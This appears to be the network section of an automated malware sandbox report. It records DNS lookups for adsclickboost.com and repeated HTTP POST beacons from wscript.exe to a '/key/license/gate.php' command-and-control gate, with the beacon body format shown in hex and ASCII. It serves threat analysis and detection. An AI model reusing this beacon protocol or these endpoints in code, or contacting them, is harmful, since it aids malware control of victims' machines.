Mar 9, 2021 09:21:57.298078060 CET	8.8.8.8	192.168.2.5	0xd60f	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:01.707762957 CET	8.8.8.8	192.168.2.5	0x53ad	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:01.707762957 CET	8.8.8.8	192.168.2.5	0x53ad	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:03.133946896 CET	8.8.8.8	192.168.2.5	0x80e9	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:03.133946896 CET	8.8.8.8	192.168.2.5	0x80e9	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:04.606555939 CET	8.8.8.8	192.168.2.5	0xe9df	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:04.606555939 CET	8.8.8.8	192.168.2.5	0xe9df	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:05.419420958 CET	8.8.8.8	192.168.2.5	0xb3bc	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:05.419420958 CET	8.8.8.8	192.168.2.5	0xb3bc	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:09.902715921 CET	8.8.8.8	192.168.2.5	0x941c	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:09.902715921 CET	8.8.8.8	192.168.2.5	0x941c	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:11.721760988 CET	8.8.8.8	192.168.2.5	0xa261	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:11.721760988 CET	8.8.8.8	192.168.2.5	0xa261	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

adsclickboost.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49716	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:14.951766968 CET	1060	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 20 Host: adsclickboost.com
Mar 9, 2021 09:20:14.951808929 CET	1060	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 7c 4a 53 26 69 64 3d 31 Data Ascii: bolt=user\|\|JS&id=1
Mar 9, 2021 09:20:15.295753002 CET	1061	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d60d4ecb06216c884aaf035345f2c5bbb1615278014; expires=Thu, 08-Apr-21 08:20:14 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ab9a0500001f1d89a56000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hevf8twq4WW0KBlq8Fhw8Y6yH2dQ3QYegFPWXbTGELu7w5UT1iWGcBn6Hsf2XvoXMaq3QxuzZiKGs7ydriLZHArOSQGrvrS%2FvPCpZHLUbzue7g%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e209ac611f1d-FRA Data Raw: 62 0d 0a 30 30 7c 43 37 53 33 4b 36 4e 30 0d 0a Data Ascii: b00\|C7S3K6N0
Mar 9, 2021 09:20:15.295769930 CET	1061	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49717	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:18.768830061 CET	1067	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:18.768898964 CET	1067	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:19.146580935 CET	1072	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d4dbeffb051f07be5dc87a1f07166cd161615278018; expires=Thu, 08-Apr-21 08:20:18 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7aba8f4000054464326c000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kt6o3Nm%2F%2B4Mx4NQSRyvrmNcLI3l6lI%2F9rm%2BDLwiVYcUuvkwU529svpPVLsmIV03G71Czws3cOJCcZzZ0Qda5cT2yBTexY5rwlq5yvbkgNbSGJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e22188155446-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49734	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:49.431641102 CET	1190	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:49.432156086 CET	1190	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:49.783247948 CET	1191	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=df64d2721d78fc4d7e1dd6190dfa384381615278049; expires=Thu, 08-Apr-21 08:20:49 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac20b600002b3570943000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HfSw4VobaXpzBUrqRsVOgnjIqoYTDAmmZbjZGgjEZNsWmT3UNddrGgkByx8BuB43twOKLH0MZewrZBTmg1csTcYWUmEo0EYzBCRNg689TuX9Uw%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e2e12edc2b35-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49735	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:53.764487028 CET	1192	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:53.764552116 CET	1192	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:54.101183891 CET	1193	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d716f7b4dfd5975d572d24fc544a668191615278053; expires=Thu, 08-Apr-21 08:20:53 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac31a200004e4a09216000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sEGO0i0UrPpWOX5RHAvVHnA6DdooaPSCcCjpJoyvnLegLDr8PQwRGtLb2EvjXNr8BLr2cvRQvax6OlYt7r5GbYKFAjoJU020jbw6Uk5e5PcS1A%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e2fc3cfc4e4a-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49736	172.67.178.142	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:54.598642111 CET	1194	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:54.598696947 CET	1194	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:54.956355095 CET	1195	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d2a95bc5e7dc0b182421b892841d8a99c1615278054; expires=Thu, 08-Apr-21 08:20:54 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac34e9000000857c9fe000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vljWrpHlVai4GdGxgyzAGJjCYh431QYLz26DMzuV0xJBrUrvv%2BAa9kRqhTk1ODBzZBofokGb3m2tQ73wvUrX53BGHg1FJmf%2B3HqeqRMsfqBNhg%3D%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e30179df0085-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Mar 9, 2021 09:20:55.207986116 CET	1196	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d2a95bc5e7dc0b182421b892841d8a99c1615278054; expires=Thu, 08-Apr-21 08:20:54 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac34e9000000857c9fe000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vljWrpHlVai4GdGxgyzAGJjCYh431QYLz26DMzuV0xJBrUrvv%2BAa9kRqhTk1ODBzZBofokGb3m2tQ73wvUrX53BGHg1FJmf%2B3HqeqRMsfqBNhg%3D%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e30179df0085-LHR Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49737	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:55.570003033 CET	1197	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:55.570039988 CET	1197	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:55.909006119 CET	1198	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d064c1ed35783abc2ee536a29ed14457c1615278055; expires=Thu, 08-Apr-21 08:20:55 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac38af00000601b5091000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=D%2BipJ2xxld9ePP7ARKyeSefoprPba6KJCC21qY5gab%2FaylaxzXYYMPF41hNJHKPfl220ZWJFz4z4XBfpLe6br4KLetI3i6lWs6g9aOeP8A0p4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e3077d2a0601-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49739	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:00.729496002 CET	1208	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:00.729552984 CET	1208	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:01.085912943 CET	1209	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d123a412b7bf2a2f10c0b8637b3fb8a331615278060; expires=Thu, 08-Apr-21 08:21:00 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac4cd7000018e50a9b3000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zw0s3ulESIbXx7GwxBwD4QnhLVaymzTDr577GDOnl3AWcJSVta5ZQ9jF0YNMpaW3SWjBOGdSgCfyamjiVx33pdvS1Kn0SSxMms2bqhtbans7Ig%3D%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e327bc4318e5-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49740	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:02.765944004 CET	1210	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:02.765969038 CET	1210	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:03.102153063 CET	1218	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d6496badc2bb95f1282d35d9a9323893e1615278062; expires=Thu, 08-Apr-21 08:21:02 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac54cb000006103f2fa000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=q9DHPgVXGAlu40aUBm9FqACg9wKsfU8cXWX5EkSoHux9JYJ%2F%2FdhOnBsYD0oX5BBH%2FNDojimOx%2Bh8W%2BrM85hZphv%2B%2BC497GMPhg2bKLCAJzKmdQ%3D%3D"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e3347f3f0610-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49741	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:04.101386070 CET	1252	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:04.101474047 CET	1252	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:04.446127892 CET	1253	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dcf1daf095a040f413b5bd90f2cb802c11615278064; expires=Thu, 08-Apr-21 08:21:04 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac5a03000005d8480f2000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Tn8R9w3UfFAZcM4Nrfiwpv9GNCaRqSD5HmeJXb8tdisYh6BT5uvcbRkuNbBh6LJb2UoJa9%2BaUjtl7IpMQ2drMbC5prY83hE5ZEqGbimc5YmUOA%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e33cdda805d8-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49742	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:04.786616087 CET	1254	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:04.786643028 CET	1254	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:05.136694908 CET	1255	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=da9c22147d428d90fbf1c363a487a3ba51615278064; expires=Thu, 08-Apr-21 08:21:04 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac5cb00000d7256fbb0000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Y0X%2BK1R7re1W733ZNSo5DEwlGne2dnbb5GCEdXi85XVMZyiBJqXgWe%2FGITkuSgVHdmngocSBb1TiF3v9wH7Atyugn8WE6awWGTEqoumgiVHjhg%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e3411b4ad725-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49743	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:08.865406036 CET	1256	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:08.865483046 CET	1256	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:09.235137939 CET	1257	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dd9772a0ddd00034c39be7dcf5db81cea1615278068; expires=Thu, 08-Apr-21 08:21:08 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac6c9f000064af073aa000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XufYXA3Sr9zVNUR%2BqkUByNjL4puAwvd34JRkqYmRWMerqjhcS%2FPBMoyeTOc8qg3nTQ7%2BQ%2BELHZ4q6zREzR19L1QORSyowOLVlVBlNck740oYPw%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e35a9eaa64af-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49744	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:10.236613989 CET	1258	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:10.238893032 CET	1258	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:21:10.601907015 CET	1259	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:21:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dae97723e1abe41dd19a7f87116e19ead1615278070; expires=Thu, 08-Apr-21 08:21:10 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7ac71fa00004abc7ea5f000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2ZAIvz%2BsX25AGebYVD%2Fhe0jnVZ%2FY7DLW%2BLDUx%2BNYQ3rJBdKq1J%2BPZy7U07YRjDOfxvLPCcdVY7KT5y%2B1IIQHI7sOlnYjjlziJJbUaHfMxxOkNg%3D%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 62d2e3632a944abc-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49719	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:20:26.649158001 CET	1088	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:20:26.649223089 CET	1088	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
Mar 9, 2021 09:20:26.991022110 CET	1089	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=ded96b5798202747761958401407d296e1615278026; expires=Thu, 08-Apr-21 08:20:26 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7abc7b900004ddc1a128000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3KiGqZYuPLUGt8m8r2R5bphsb5908cVM5fTWrJuF9Kz5RwjzAaKMah9rS1BAg3M0xf9puCFaRvLoAt%2BV2fQsmxCDD10PYXhmToQy1CkKIQRISw%3D%3D"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e252ce164ddc-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Mar 9, 2021 09:20:27.232168913 CET	1090	IN	HTTP/1.1 200 OK Date: Tue, 09 Mar 2021 08:20:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=ded96b5798202747761958401407d296e1615278026; expires=Thu, 08-Apr-21 08:20:26 GMT; path=/; domain=.adsclickboost.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 08b7abc7b900004ddc1a128000000001 Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3KiGqZYuPLUGt8m8r2R5bphsb5908cVM5fTWrJuF9Kz5RwjzAaKMah9rS1BAg3M0xf9puCFaRvLoAt%2BV2fQsmxCDD10PYXhmToQy1CkKIQRISw%3D%3D"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62d2e252ce164ddc-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49745	104.21.48.50	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 9, 2021 09:21:12.802946091 CET	1260	OUT	POST /key/license/gate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: en-us User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 Content-Length: 23 Host: adsclickboost.com
Mar 9, 2021 09:21:12.802999020 CET	1260	OUT	Data Raw: 62 6f 6c 74 3d 61 6c 66 6f 6e 73 7c 43 37 53 33 4b 36 4e 30 7c 4a 53 Data Ascii: bolt=user\|C7S3K6N0\|JS
